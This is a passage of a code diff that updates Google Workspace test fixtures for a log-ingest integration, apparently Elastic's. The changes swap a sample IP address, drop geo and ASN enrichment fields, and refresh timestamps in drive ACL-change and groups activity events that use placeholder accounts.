title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", "provider": "drive", "action": "change_acl_editors", "id": "1", @@ -2161,31 +1765,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2205,7 +1791,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2243,8 +1829,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822626800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_access_scope\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", + "ingested": "2021-12-09T13:39:08.398415Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_access_scope\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", "provider": "drive", "action": "change_document_access_scope", "id": "1", @@ -2265,31 +1851,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2309,7 +1877,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2347,8 +1915,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822628300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_visibility\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", + "ingested": "2021-12-09T13:39:08.398418500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_document_visibility\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"owner\"},{\"name\":\"old_value\",\"value\":\"writers\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_visibility\",\"value\":\"people_within_domain_with_link\"},{\"name\":\"visibility_change\",\"value\":\"external\"},{\"name\":\"target_domain\",\"value\":\"all\"}]}}", "provider": "drive", "action": "change_document_visibility", "id": "1", @@ -2369,31 +1937,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2414,7 +1964,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2451,8 +2001,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822629700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_membership_change\",\"parameters\":[{\"name\":\"added_role\",\"value\":\"editor\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"removed_role\",\"value\":\"content_manager\"},{\"name\":\"membership_change_type\",\"value\":\"add_to_shared_drive\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:08.398423Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_membership_change\",\"parameters\":[{\"name\":\"added_role\",\"value\":\"editor\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"removed_role\",\"value\":\"content_manager\"},{\"name\":\"membership_change_type\",\"value\":\"add_to_shared_drive\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", "provider": "drive", "action": "shared_drive_membership_change", "id": "1", @@ -2473,31 +2023,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2518,7 +2050,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2555,8 +2087,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822631100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_settings_change\",\"parameters\":[{\"name\":\"new_settings_state\",\"value\":\"restricted\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_settings_state\",\"value\":\"unrestricted\"},{\"name\":\"shared_drive_settings_change_type\",\"value\":\"direct_acl\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:08.398428200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"shared_drive_settings_change\",\"parameters\":[{\"name\":\"new_settings_state\",\"value\":\"restricted\"},{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"old_settings_state\",\"value\":\"unrestricted\"},{\"name\":\"shared_drive_settings_change_type\",\"value\":\"direct_acl\"},{\"name\":\"target\",\"value\":\"user@example.com\"}]}}", "provider": "drive", "action": "shared_drive_settings_change", "id": "1", @@ -2577,31 +2109,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2621,7 +2135,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2654,8 +2168,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822632500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"sheets_import_range_access_change\",\"parameters\":[{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:39:08.398433200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"sheets_import_range_access_change\",\"parameters\":[{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"sheets_import_range_recipient_doc\",\"value\":\"1234\"}]}}", "provider": "drive", "action": "sheets_import_range_access_change", "id": "1", @@ -2676,31 +2190,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2721,7 +2217,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2759,8 +2255,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822633900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_user_access\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"can_comment\"},{\"name\":\"old_value\",\"value\":\"can_view\"},{\"name\":\"old_visibility\",\"value\":\"people_with_link\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"target_user\",\"value\":\"user@example.com\"},{\"name\":\"visibility\",\"value\":\"private\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", + "ingested": "2021-12-09T13:39:08.398437400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"acl_change\",\"name\":\"change_user_access\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"new_value\",\"value\":\"can_comment\"},{\"name\":\"old_value\",\"value\":\"can_view\"},{\"name\":\"old_visibility\",\"value\":\"people_with_link\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"target_user\",\"value\":\"user@example.com\"},{\"name\":\"visibility\",\"value\":\"private\"},{\"name\":\"visibility_change\",\"value\":\"external\"}]}}", "provider": "drive", "action": "change_user_access", "id": "1", diff --git a/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log b/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log index e67fe7571a3..5014f5a7063 100644 --- a/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log +++ b/packages/google_workspace/data_stream/groups/_dev/test/pipeline/test-groups.log @@ -1,25 +1,25 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_acl_permission","parameters":[{"name":"acl_permission","value":"can_add_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value_repeated","multiValue":["managers","members"]},{"name":"old_value_repeated","multiValue":["managers"]}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"accept_invitation","parameters":[{"name":"group_email","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"approve_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"join","parameters":[{"name":"group_email","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"request_to_join","parameters":[{"name":"group_email","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_basic_setting","parameters":[{"name":"basic_setting","value":"allow_external_members"},{"name":"group_email","value":"group@example.com"},{"name":"new_value","value":"true"},{"name":"old_value","value":"false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"create_group","parameters":[{"name":"group_email","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"delete_group","parameters":[{"name":"group_email","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_identity_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"identity_setting","value":"required_forms_of_identity"},{"name":"new_value","value":"display_name_only"},{"name":"old_value","value":"display_name_or_google_profile"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"add_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"new_value","value":"footer"},{"name":"old_value","value":"old footer"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"remove_info_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"info_setting","value":"custom_footer"},{"name":"value","value":"footer"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_new_members_restrictions_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"new_members_restrictions_setting","value":"new_members_can_post"},{"name":"new_value","value":"inherit"},{"name":"old_value","value":"overriden_to_false"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_post_replies_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"post_replies_setting","value":"where_should_replies_be_sent"},{"name":"new_value","value":"reply_to_custom_address"},{"name":"old_value","value":"reply_to_author_only"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_spam_moderation_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"spam_moderation_setting","value":"how_to_handle_suspected_spam_messages"},{"name":"new_value","value":"moderate_and_do_not_send_notifications"},{"name":"old_value","value":"moderate_and_send_notifications"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"change_topic_setting","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"topic_setting","value":"allowed_topic_types"},{"name":"new_value","value":"discussions_questions"},{"name":"old_value","value":"discussions"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"moderate_message","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"message_moderation_action","value":"approved"},{"name":"status","value":"succeeded"},{"name":"message_id","value":"message id"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"always_post_from_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"status","value":"succeeded"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"add_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"ban_user_with_moderation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"},{"name":"member_role","value":"manager"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"revoke_invitation","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"invite_user","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"groups","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"moderator_action","name":"reject_join_request","parameters":[{"name":"group_email","value":"group@example.com"},{"name":"user_email","value":"user@example.com"}]}} 